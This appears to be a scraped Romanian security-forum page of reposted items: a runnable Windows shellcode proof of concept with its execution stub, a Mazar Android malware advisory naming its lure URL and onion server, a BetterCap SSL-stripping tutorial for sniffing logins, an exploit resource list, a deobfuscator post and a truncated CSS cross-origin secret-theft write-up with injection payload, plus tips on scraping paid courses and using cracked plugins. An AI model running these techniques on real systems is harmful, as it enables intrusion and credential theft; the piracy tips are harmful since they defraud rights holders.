Leaderboard

Descarcati: https://github.com/nishad/udemy-dl-windows/releases Creati un cont nou pe udemy, nu conteaza ce email folositi pentru ca nu trebuie verificat Deschideti cursul dorit si apasati pe Start Free Preview (apare sub Take This Course) Rulati programul astfel: udemy-dl.exe -u email -p pass <link catre curs> Screenshots pentru cei batuti in cap: Spor la invatat

Ne lasi bre cu rahaturile astea? bine ca pui semnatura cu font cat scula calului pentru un link de ref. Sa postezi ceva acatarea nu te duce mintea.

Windows x86 SwapMouseButton shellcode /* Title: Windows x86 SwapMouseButton shellcode Author: Ionut Popescu Date: December 2015 Tested on: Windows 7/Windows 10 Build/Run: Visual C++ Express Edition Shellcode written for educational purposes. Detailed description: - http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/ - http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/ - http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/ */ /* ; Shellcode details ; ----------------- xor ecx, ecx mov eax, fs:[ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset namestable add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0 Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 0x50746547 ; GetP jnz Get_Function cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword ptr[eax + 0x8], 0x65726464 ; ddre jnz Get_Function mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx mov esi, [edx + 0x1c] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) add esp, 0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 push eax ; EAX = LoadLibrary push ecx mov cx, 0x6c6c ; ll push ecx push 0x642e3233 ; 32.d push 0x72657375 ; user push esp ; "user32.dll" call eax ; LoadLibrary("user32.dll") add esp, 0x10 ; Clean stack mov edx, [esp + 0x4] ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ecx mov ecx, 0x616E6F74 ; tona push ecx sub dword ptr[esp + 0x3], 0x61 ; Remove "a" push 0x74754265 ; eBut push 0x73756F4D ; Mous push 0x70617753 ; Swap push esp ; "SwapMouseButton" push eax ; user32.dll address call edx ; GetProc(SwapMouseButton) add esp, 0x14 ; Cleanup stack xor ecx, ecx ; ECX = 0 inc ecx ; true push ecx ; 1 call eax ; Swap! add esp, 0x4 ; Clean stack pop edx ; GetProcAddress pop ebx ; kernel32.dll base address mov ecx, 0x61737365 ; essa push ecx sub dword ptr [esp + 0x3], 0x61 ; Remove "a" push 0x636f7250 ; Proc push 0x74697845 ; Exit push esp push ebx ; kernel32.dll base address call edx ; GetProc(Exec) xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess */ #include "stdafx.h" #include <Windows.h> int main() { char *shellcode = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75" "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68" "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73" "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68" "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9" "\x41" // inc ecx - Remove this to restore the functionality "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61" "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0"; // Set memory as executable DWORD old = 0; BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old); // Call the shellcode __asm { jmp shellcode; } return 0; }

Source: https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/ Felicitari lui Andra Zaharia! Our team at Heimdal Security has recently analyzed a text message sent to random mobile numbers. The Geographical extent is so far unknown, so please exercise caution. The SMS / MMS in question arrives with the following contents (sanitized by Heimdal Security): You have received a multimedia message from +[country code] [sender number] Follow the link http: //www.mmsforyou [.] Net / mms.apk to view the message. If the APK (which is a program file for Android) is run on an Android-powered smartphone, then it will gain administrator rights on the victim’s device. This will allow the attackers to: SEND_SMS RECEIVE_BOOT_COMPLETED INTERNET SYSTEM_ALERT_WINDOW WRITE_SMS ACCESS_NETWORK_STATE WAKE_LOCK GET_TASKS CALL_PHONE RECEIVE_SMS READ_PHONE_STATE READ_SMS ERASE_PHONE Our team has identified the malicious APK to be the Mazar Android BOT, a threat also that Recorded Future spotted in November 2015. The malicious packet (APK) retrieves TOR and installs it on the victim’s phone via the following harmless URLs: https: //f-droid.org/repository/browse/?fdid=org.torproject.android https: //play.google.com/store/apps/details?id=org.torproject.android In the next phase of the attack, the infection will unpack and run the TOR application, which will then be used to connect to the following server: http: // pc35hiptpcwqezgs [.] Onion. After that, an automated SMS will be sent to the number 9876543210 (+98 is the country code for Iran) with the text message: “Thank you”. The catch is that this SMS also includes the device’s location data. This specific mobile malware opens the doors to all kinds of malicious consequences for the victim. Attackers can: Open a backdoor into Android smartphones, to monitor and control them as they please; Send SMS messages to premium channel numbers, seriously increasing the victim’s phone bill; Read SMS messages, which means they can also read authentication codes sent as part of two-factor authentication mechanisms, used also by online banking apps and ecommerce websites; Use their full access to Android phones to basically manipulate the device to do whatever they want. And it gets worse. The attackers behind Mazar BOT also implemented the “Polipo proxy“, which gives them additional access to even more Android functionalities. Polipoid brings the Polipo HTTP proxy to Android. Polipo lets you do useful things such as cache web pages for offline access and should generally speed up browsing a little. Source: Github Through this proxy, cyber criminals can change the traffic and interpose themselves between the victim’s phone and a web-based service. This effectively becomes a Man-in-the-Middle attack. Here’s how it happens: Data is copied to your phone as mp3 files: 122.933 polipo.mp3 1,885,100 tor.mp3 Then, the proxy is configured as you can see below: 174.398 debiancacerts.bks 574 torpolipo.conf 879 torpolipo_old.conf 212 torrc 276 torrc_old For those technically inclined, the configuration of the TOR proxy will seem quite straightforward: proxy address = “127.0.0.1” proxy port = 8118 allowedClients = 127.0.0.1 allowedPorts = 1-65535 proxy name = “127.0.0.1” cacheIsShared = false socksParentProxy = “127.0.0.1:9050” socksProxyType = socks5 diskCacheRoot = “” localDocumentRoot = “” disableLocalInterface = true disableConfiguration = true dnsUseGethostbyname = yes disableVia = true from, accept-language, x-pad link censor referer = maybe maxConnectionAge = 5m maxConnectionRequests = 120 serverMaxSlots = 8 server slots = 2 tunnelAllowedPorts = 1-65535 chunkHighMark = 11000000 object high mark = 128 As if it weren’t enough that it can stop calls and launch other aggressive commands on the victim’s phone, Mazar BOT is also capable of injecting itself into Chrome. And there are several other settings and commands that Mazar BOT can trigger, as showcased below. These include: Controlling the phone’s keys Enabling the sleep mode Save actions in the phone’s settings, etc. Our team was not surprised to observe that the malware cannot be installed on smartphones running Android with the Russian language option. Mazar BOT will check the phone to identify the victim’s country and this will stop the malicious APK if the targeted phone turns out to be owned by a Russian user: locale.getCountry () equalsIgnoreCase ( “RU”)) Process.killProcess (Process.myPid ()); Until now, Mazar BOT has been advertised for sale on several websites on the Dark Web, but this is the first time we’ve seen this code be abused in active attacks. Attackers may be testing this new type of Android malware to see how they can improve their tactics and reach their final goals, which probably is making more money (as always). We can expect this malware to expand its reach, also because of its ability to remain covert by using TOR to hide its communication. As you may have anticipated, antivirus detection of the malicious APK is very low: 3/54 on VirusTotal. There are a few things you can do to keep your phone safe from Mazar BOT, and we recommend you take a moment now to verify and adjust these settings. 1. First of all, NEVER click on links in SMS or MMS messages on your phone. Android phones are notoriously vulnerable and current security product dedicated to this OS are not nearly as effective as they are on computers. 2. Go to Settings > Security and make sure this option is turned OFF: „Unknown Sources – Allow installation of apps from sources other than the playstore.” 3. Install a top antivirus for Android. It may not be enough to protect your phone, but it’s certainly good to have. You can find top-rated options in this article. 4. Do not connect to unknown and unsecured Wi-Fi hotspots. There are plenty of dangers lurking out there, and following some common-sense steps to keep yourself safe from them is the best thing to do. Also, keep your Wi-Fi turned OFF when you don’t use it. 5. Install a VPN on your smartphone and use constantly. It’s good for both your privacy and your security. 6. Maintain a cautious attitude at all times. Android security has not kept up with the high adoption rate of smartphones running the OS, and users may have to wait a long time until better security solutions appear. Until then, a careful evaluation of what happens on your phone is a very good safeguard.

SSL Stripping and HSTS Bypass with BetterCap Since version 1.3.0 BetterCap is able to perform SSL stripping and since version 1.3.8 it also performs HSTS bypass, but what are exactly these techniques and how can we use them? SSL Stripping SSL stripping is a technique introduced by Moxie Marlinspike during BlackHat DC 2009, the website description of this technique goes like: Long story short, this technique will replace every https link in webpages the target is browsing with http ones so, if a page would normally look like: ... <a href="https://www.facebook.com/">Login</a> ... During a SSL stripping attack its HTML code will be modified as: ... <a href="http://www.facebook.com/">Login</a> ... Being the man in the middle, this allow us to sniff and modify pages that normally we wouldn't be able to even see. HSTS Bypass SSL stripping worked quite well until 2010, when the HSTS specification was introduced, Wikipedia says: Moreover HSTS policies have been prebuilt into major browsers meaning that now, even with a SSL stripping attack running, the browser will connect to HTTPS anyway, even if the http:// schema is specified, making the attack itself useless. Picture credits to Scott Helme For this reason, Leonardo Nve Egea presented sslstrip+ ( or sslstrip2 ) during BlackHat Asia 2014. This tool was an improvement over the original Moxie's version, specifically created to bypass HSTS policies. Since HSTS rules most of the time are applied on a per-hostname basis, the trick is to downgrade HTTPS links to HTTP and to prepend some custom sub domain name to them. Every resulting link won't be valid for any DNS server, but since we're MITMing we can resolve these hostnames anyway. Let's take the previous example page: ... <a href="https://www.facebook.com/">Login</a> ... A HSTS bypass attack will change it to something like: ... <a href="http://wwww.facebook.com/">Login</a> ... Notice that https has been downgraded to http and www replaced with wwww ). When the "victim" will click on that link, no HSTS rule will be applied ( since there's no rule for such subdomain we just created ) and the MITM software ( BetterCap in our case ) will take care of the DNS resolution, allowing us to see and alter the traffic we weren't supposed to see. Using BetterCap Using BetterCap to perform such attack is very easy, there's no special command line argument for it since everything ( both SSL stripping and HSTS bypass ) was implemented as builtin features of the transparent proxy, you only need to enable it: sudo bettercap --proxy -P POST The following screenshot was taken during a test run, as you can see Facebook was succesfully SSL-stripped and I was able to sniff login credentials in cleartext. Sursa: https://www.bettercap.org/blog/sslstripping-and-hsts-bypass/#.VsHQflQ9TwA.twitter

Salut, Acum 18 zile am creat un topic chiar pe acest forum in care intrebam daca se ocupa careva cu amazon associates (topicul aici) , topic la care nu mi-a raspuns nimeni, tind sa cred ca ori nu sunt oameni care se ocupa cu asa ceva, ori cei care o fac deja nu vor sa dezvaluie tainele amazonului. Am inceput sa ma documentez, sa vad ce si cum, care este regulamentul, de ce am nevoie etc. Pentru ca deja sunt in domeniul dropshippingului pe o anumita nisa, am hotarat ca pe amazon o sa merg tot pe acea nisa, pentru ca aveam deja pagini de social media facute cu oameni care au cumparat, pagini care le-am construit manual si am cladit un anumit nivel de incredere. Cum am precizat si in alte topicuri ale mele, eu vand doar prin intermediul social media, nu am treaba cu motoare de cautare. Ma chinuii de vreo 2 zile sa scriu aceste randuri, acesta nu este un articol , mie imi place sa-i spun motivatie, pentru ca speram ca pentru amazon sa mai gasesc ceva oameni dispusi sa faca bani si sa invete. Pe 1 am facut topicul si pe 2 seara aveam deja site-ul pus la punct cu sistemul de la amazon integrat, automatizat in proportie de 60%. Acestea sunt castigurile mele de pe 2 pana pe 16 a aceste-i luni : Potentialii mei clienti sunt aproximativ 200.000 daca stau sa adun toti care-i am pe social media (facebook, twitter, instagram, pinterest). Acum sa va spun de ce aveti nevoie : - de un domeniu + hosting - Wordpress - plugin-uri de automatizare (woocommerce amazon affiliates, prosociate) - o nisa - de timp sa-ti construiesti cateva pagini de social media pe anumite nise (daca ai un 10-15 dolari cred ca poti cumpara, ieri am achizitionat un cont de instagram cu 66k pe nisa mea cu 25$) sau daca esti tare si ai cunostinte, te bagi pe seo si pe bazezi pe motoarele de cautare. - timp in fiecare zi cam o ora sa mai bagi produse noi (se face automat, tu doar sa le alegi ) Pe scurt ai nevoie de vreo 10-15 dolari sa-ti iei domeniu si hosting ok pentru o luna iar restul resurselor se gasesc gratuite / crackuite de care te poti folosi pana ti le poti cumpara. Ps: Daca careva vrea sa invete mai multe, mie personal acest topic mi-a fost de ajuns. Spor la bani

Intro to ARP spoofing with bettercap I recently discovered a fairly new man-in-the-middle tool called bettercap, which I will test in this video. I will explain the concept of ARP spoofing, install bettercap, and see how one can use it to sniff passwords on a network. Here it is: If you liked it, checkout my other trainings: http://hackademy.aetherlab.net Sursa: http://aetherlab.net/2016/02/intro-to-arp-spoofing-with-bettercap/

Mai du-te ma in pula noastra cu threadurile astea de cacat.

A curated list of awesome Windows Exploitation resources, and shiny things. Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows memory protections Bypassing filter and protections Typical windows exploits Exploit development tutorial series Corelan Team Fuzzysecurity Securitysift Tools Windows stack overflows Stack Base Overflow Articles. Win32 Buffer Overflows (Location, Exploitation and Prevention) - by dark spyrit [1999] Writing Stack Based Overflows on Windows - by Nish Bhalla’s [2005] Windows heap overflows Heap Base Overflow Articles. Third Generation Exploitation smashing heap on 2k - by halvar Flake [2002] Exploiting the MSRPC Heap Overflow Part 1 - by Dave Aitel (MS03-026) [September 2003] Exploiting the MSRPC Heap Overflow Part 2 - by Dave Aitel (MS03-026) [September 2003] windows heap overflow penetration in black hat - by David litchfield [2004] Kernel based Windows overflows Kernel Base Exploit Development Articles. how to attack kernel based vulns on windows was done - by a Polish group called “sec-labs” [2003] sec-lab old whitepaper sec-lab old exploit Windows Local Kernel Exploitation (based on sec-lab research) - by S.K Chong [2004] How to exploit Windows kernel memory pool - by SoBeIt [2005] exploiting remote kernel overflows in windows - by eeye security Kernel-mode Payloads on Windows in uninformed - by matt miller Exploiting 802.11 Wireless Driver Vulnerabilities on Windows BH US 2007 Attacking the Windows Kernel Remote and Local Exploitation of Network Drivers Exploiting Comon Flaws In Drivers I2OMGMT Driver Impersonation Attack Real World Kernel Pool Exploitation exploit for windows 2k3 and 2k8 nalyzing local privilege escalations in win32k Intro to Windows Kernel Security Development There’s a party at ring0 and you’re invited Windows kernel vulnerability exploitation Windows memory protections Windows memory protections Introduction Articles. Data Execution Prevention /GS (Buffer Security Check) /SAFESEH ASLR SEHOP Bypassing filter and protections Windows memory protections Bypass Methods Articles. Third Generation Exploitation smashing heap on 2k - by halvar Flake [2002] chris anley wrote Creating Arbitrary Shellcode In Unicode Expanded Strings Dave aitel advanced windows exploitation - [2003] Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server - by david litchfield reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) - by matt Conover in cansecwest 2004 Safely Searching Process Virtual Address Space - by matt miller [2004] IE exploit and used a technology called Heap Spray bypassing hardware-enforced DEP - by skape (matt miller) and Skywing (ken johnson) [October 2005] Exploiting Freelist[0] On XP Service Pack 2 - by brett moore [2005] Kernel-mode Payloads on Windows in uninformed Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting Comon Flaws In Drivers Heap Feng Shui in JavaScript by Alexander sotirov [2007] Understanding and bypassing Windows Heap Protection - by Nicolas Waisman [2007] Heaps About Heaps - by brett moore [2008] Bypassing browser memory protections in Windows Vista - by Mark Dowd and Alex Sotirov [2008] Attacking the Vista Heap - by ben hawkes [2008] Return oriented programming Exploitation without Code Injection - by Hovav Shacham (and others ) [2008] Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 - by Cesar Cerrudo [2008] Defeating DEP Immunity Way - by Pablo sole [2008] Practical Windows XP2003 Heap Exploitation - by John McDonald and Chris Valasek [2009] Bypassing SEHOP - by Stefan Le Berre Damien Cauquil [2009] Interpreter Exploitation : Pointer Inference and JIT Spraying - by Dionysus Blazakis[2010] write-up of Pwn2Own 2010 - by Peter Vreugdenhil all in one 0day presented in rootedCON - by ruben santamarta [2010] DEP/ASLR bypass using 3rd party - by Shahin Ramezany [2013] Typical windows exploits real-world HW-DEP bypass Exploit - by devcode bypassing DEP by returning into HeapCreate - by toto first public ASLR bypass exploit by using partial overwrite - by skape heap spray and bypassing DEP - by skylined first public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability exploit codes of bypassing browsers memory protections PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 - by Cesar Cerrudo PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 - by Cesar Cerrudo an exploit works from win 3.1 to win 7 - by Tavis Ormandy KiTra0d old ms08-067 metasploit module multi-target and DEP bypass PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass SMBv2 Exploit - by Stephen Fewer Exploit development tutorial series Exploid Development Tutorial Series Base on Windows Operation System Articles. Corelan Team Exploit writing tutorial part 1 : Stack Based Overflows Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode Exploit writing tutorial part 3 : SEH Based Exploits Exploit writing tutorial part 3b : SEH Based Exploits – just another example Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc Exploit writing tutorial part 8 : Win32 Egg Hunting Exploit writing tutorial part 9 : Introduction to Win32 shellcoding Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s Cube Exploit writing tutorial part 11 : Heap Spraying Demystified Fuzzysecurity Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] Securitysift Windows Exploit Development – Part 1: The Basics Windows Exploit Development – Part 2: Intro to Stack Based Overflows Windows Exploit Development – Part 3: Changing Offsets and Rebased Modules Windows Exploit Development – Part 4: Locating Shellcode With Jumps Windows Exploit Development – Part 5: Locating Shellcode With Egghunting Windows Exploit Development – Part 6: SEH Exploits Windows Exploit Development – Part 7: Unicode Buffer Overflows Tools Disassemblers, debuggers, and other static and dynamic analysis tools. angr - Platform-agnostic binary analysis framework developed at UCSB's Seclab. BARF - Multiplatform, open source Binary Analysis and Reverse engineering Framework. binnavi - Binary analysis IDE for reverse engineering based on graph visualization. Bokken - GUI for Pyew and Radare. Capstone - Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro - Web based code browser using clang to provide basic code analysis. dnSpy - .NET assembly editor, decompiler and debugger. Evan's Debugger (EDB) - A modular debugger with a Qt GUI. GDB - The GNU debugger. GEF - GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep - A utility to search for strings in PE executables including imports, exports, and debug symbols. IDA Pro - Windows disassembler and debugger, with a free evaluation version. Immunity Debugger - Debugger for malware analysis and more, with a Python API. ltrace - Dynamic analysis for Linux executables. objdump - Part of GNU binutils, for static analysis of Linux binaries. OllyDbg - An assembly-level debugger for Windows executables. PANDA - Platform for Architecture-Neutral Dynamic Analysis PEDA - Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio - Perform static analysis of Windows executables. Process Monitor - Advanced monitoring tool for Windows programs. Pyew - Python tool for malware analysis. Radare2 - Reverse engineering framework, with debugger support. SMRT - Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace - Dynamic analysis for Linux executables. Udis86 - Disassembler library and tool for x86 and x86_64. Vivisect - Python tool for malware analysis. X64dbg - An open-source x64/x32 debugger for windows.

Aproape am râs

((void (*)(void))shellcode)(); Defineste un pointer la o functie care nu returneaza nimic, nu are niciun parametru, are adresa "shellcode" si o apeleaza. Dar tot e necesar ca zona respectiva de memorie sa fie marcata ca "RWX" cu VirtualProtect. Exemplu: https://www.exploit-db.com/exploits/38959/

Script Deobfuscator Released Posted on February 15, 2016 by darryl The purpose of this tool is to help you perform static analysis on obfuscated scripts. It’s often easier to dynamically analyze scripts but there are times when you just don’t know where to start or you just want a high-level view of what’s going on with the script. This tool may be able to help you. I already wrote a tool called PHP Script Decoder but this new version has been re-written in .NET with new functionality and flexibility in order to handle PHP, Javascript, VBA, and VBS scripts. To explain how to use this tool, let me show you how to tackle seven different obfuscated scripts. Example #1 (unphp) Here’s what the script looks like. Looking at the script, you’ll see an array of base64-encoded strings at the top. Following that are references to specific elements from the array. Paste in the script sections like so. The script you are trying to deobfuscate is at the top. The array of base64-encoded strings separated by commas in the middle section. I enter the search string value of “_705650624(#)” since that’s how the script at the top references the elements from the array (note: the pound sign is a wildcard and must be present). I select the “Array” method and click on the “Convert” button. The results still show encoded strings so now I check the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options and try again. The script has been deobfuscated and much easier to read. The script won’t execute though because the strings are quoted (or unquoted) incorrectly. Example #2 (ddecode) Here’s the script we’ll be working on: First we need to unescape it so click on the “Unescape” button. If you right-click on the Output box, there’s an option to save the results to a text file. (You can right-click on the Input box and read in a file too.) Click on “Copy Output to Input” to move the result to the top. This script uses randomize variable names and assigns a value to it. The later portion references the value. The tool will parse the script and load each variable and associated value into an array. It then does a search for the variable and replaces it with the value. Choose the “Random Vars 1” method. The delimiter for this script is a semi-colon and for the search string I enter ${“GLOBALS”}[“#”]=”*”; The pound sign is a placeholder for the variable name and the asterisk is the placeholder for the value. Here’s the result: Example #3 (unphp) This script also uses random variable names but in this version, the strings are base64-encoded. The top portion defines the global variables while the lower section, beginning at “session_start()”, references them. Paste the script sections in the tool as follows then choose the “Random Vars 2” method and the “Base64 Decode” and “Keep Quotes” options. Note the search string has spaces in between so that it matches the script at the top. Example #4 (unphp) Here’s what the script looks like (I highlighted the key): This script references an element in an array to build the values for its variables. The elements are based on the character position in the key. The first step is to paste the entire script in the input box and choose the key lookup option. I use $f9[#] as the search string. In the Lookup Key box, paste the key and remove the starting and ending quotes. Also make sure the key you paste in has been properly escaped. You can see there’s concatenation going on so check the “Concatenate” option. Example #5 (ddecode) In this example, we’re just interested in decoding the base64 strings. Copy the entire script to the Input box, choose the “Base64” method as well as the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options. Make sure the delimiter and search string matches that of the script. Example #6 (pastebin) This script is uses the Joomla exploit and contains decimal values making it tough to see immediately what this does. Paste the script into the Input box and choose the “ASCII” method. Almost but it’s not concatenated. If you choose the “Concatenate” option, it won’t clean up everything. In the “Output Options” section, there’s a “Remove Chars” box. Enter a period and try again. Example #7 (pastebin) This last example is a VBA script. It does a simple math calculation then the result is convert to its ASCII character equivalent. Paste the script in and choose the “Math” method. The result shows decimal values but not the text equivalent. So enter “chr(” into the “Pre Str” box and a closing parenthesis in the “Post Str” box. Look familiar? Now we can use the “ASCII” method to get the characters. I also entered an ampersand and space character in the “Remove Chars” box. The resulting deobfuscated script will probably error out if you try executing it. Again, all this tool will do is try to make the script readable so you can better understand it. You may need to use this tool on parts of the script then put them back together yourself to figure things out. I tried to make the functions in this tool flexible and generic enough to handle whatever scripts come your way. However, if you encounter something new, please let me know. You can get the tool here. Happy reversing! Sursa: http://www.kahusecurity.com/2016/script-deobfuscator-released/

Stealing Secrets with CSS : Cross Origin CSS Attacks In this post I'm going to discuss a web attack that was designated CVE-2015-5826 and CVE-2015-1287 which abuses the way CSS parsing works in some browsers and expands the way we think about HTML injection attacks. Introduction CSS Cross Origin attacks work by constructing CSS style-sheets from vulnerable pages and extracting sensitive information from these pages in the form of CSS property attributes. Vulnerable pages include anything page that allows an attacker to inject arbitrary printable unhindered alphanumeric text including braces, brackets and parenthesis; basically any subset of the ASCII table that allows you to construct valid CSS. Attacks with an even more restricted character set may be possible depending on the content of the vulnerable page. Most modern browsers including Firefox, Chrome and Opera have recently included defenses for this attack although to outdated browsers this attack still poses a threat. In order to have an HTML page treated as CSS the browser needs to operate in Quirks Mode, the following section explains what and how this "mode" is. Quirks Mode CSS parsers can be configured to run in a "greedy" or "best effort" mode; in which they ignore anything that isn't CSS syntax and gobble up everything else in an effort to deliver as user friendly and backward compatible experience as possible (if I had a 1 cent for every time a user experience decision caused a security vulnerability...). The idea comes from the days when browsers were far and few between (there was basically Netscape and Microsoft Explorer) and this meant there was little in the way of standardizing web scripting, well there wasn't any need to. The W3C then introduced standards in order to try (as futile as that try was) to civilize the web to some extent, but this meant that if browsers adopted these standards cold turkey there would be tons of web pages written according the old lore that would not work anymore; thus a special operating mode was introduced to accommodate these pages. This "special operating" mode is called Quirks mode and can be triggered by starting off an HTML document with an invalid Document Type Declaration. For some browsers quirks mode introduces behavior more interesting than just ignoring faulty CSS, it affects the way Content-Type headers are interpreted. For instance in quirks mode, if CSS is loaded or referenced in a link or style element the Content-Type header will be ignored and the content returned will be interpreted as CSS! To quote: Stylesheets linked in the document with an advisory mime type of text/css will still be treated as CSS even if the server gives a Content-Type header other than text/css. -- https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior Of course what that means is that any kind of document can then be treated as CSS, which means as an attacker if you can inject a document into a style-sheet reference it gives him/her tremendous freedom! You might even be able to have an inject-able HTML document be treated as CSS itself That last sentence was pretty important, its actually the realization that this post is trying to share with you, if you don't completely get it please re-read it until you do. Besides Quirks Mode ofcourse there's the full on standards compliant mode called Standards mode; this is only engaged when an HTML document is started with a valid DTD. So if an HTML document starts off with a DTD that looks like this : <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> or any other valid DTD it will parse the entire document in Standard Mode. And the following DTDs are examples that will trigger quirks mode most modern browsers: <!DOCTYPE html PUBLIC > <!DOCTYPE html BLAH> <!DOCTYPE> Basically any non-valid DTD. You can check which mode a browser is parsing HTML by inspecting the document.compatMode property via JavaScript; as follows: document.compatMode == "CSS1Compat" ? "Browser is in Standards Mode" : "Browser is in Quirks Mode" Here's some screenshots of that little script in action with some examples of DTDs that trigger the two parsing modes: Browser parsing in Standards mode Browser Parsing in Quirks Mode And here's a summary of how different browsers behave according to my research on the subject: Summary of how browsers respond to some DTDs for HTML *Q - Quirks Mode *S - Standards Mode *Tests were done using Firefox 44.0.2, Opera 35.0, Chrome 48.0 Obviously upon finding out that Quirks Mode will force browsers to ignore content type headers I had to check it out for myself, here's a couple screenshots of me doing that: In the screenshot above we can see Firefox loading up the HTML page shown in the bottom right, which references the CSS shown in the bottom left. I'm using PHP to force my Apache2 web server to return a Content-Type header of text/plain which means its just basic text. And as you can see the browser's console appropriately warns us that some text is trying to be loaded as CSS. Exactly the same situation as the previous screenshot except that the DTD of the HTML page being loaded forces the browser into Quirks Mode and as a result the CSS (being served with a text/plain Mime type) is parsed and applied to the text on the page! The Setup So that is the awesomeness that is Quirks Mode, lets talk about the vulnerability for a second. In this scenario we have a simple page vulnerable to injection. We need to clear a few rules of engagement here though, when I say "vulnerable to injection" I mean the following: only alphanumeric,quotes ",' and braces {}, brackets [] and parenthesis () we can exclude any active content injection from this case as well In this example I'm using the same origin to host the attack page, this is merely for demonstration purposes and because all the browsers I currently have include protections for the attack. So basically you have a page in which you can influence the text content. Where's the page I'm going to use for this demonstration: <?php echo " <!DOCTYPE html asfdasfdadf> <html> <head> <link rel=\"stylesheet\" href=\"incorrectMime.php?type=plain\"> </head> <div id=\"text\"> This text should be red <br> </div> Injection point: ".$_GET["injectme"]." secret goes here'} </html>"; ?> view rawinjectme.php hosted with ❤ by GitHub Obviously there is no hindrance here to a full on XSS attack, you would just need to imagine that there's some hectic WAF blocking anything that could be used to execute XSS. The Attack The Attack works as follows, we want to bypass same origin policy in order to steal the secret embedded on the page. You can think of this secret as a Cross Site Request Forgery (CSRF) token, credit card number, password etc. We are going to do this by forcing our victims browser to use the inject-able page as CSS on a page we control. The attack will extract the information by having the piece of information we are targeting interpreted as an attribute of a CSS property i.e. a font-family name or background image URL value. So in summary the attacker prepares a page that includes the vulnerable page as a style sheet, and extracts the information (usually using JavaScript). Lets see how this works Payload We're going to use the following injection payload: %0A{}.extract{font-family:' this will cause the page to render as follows: 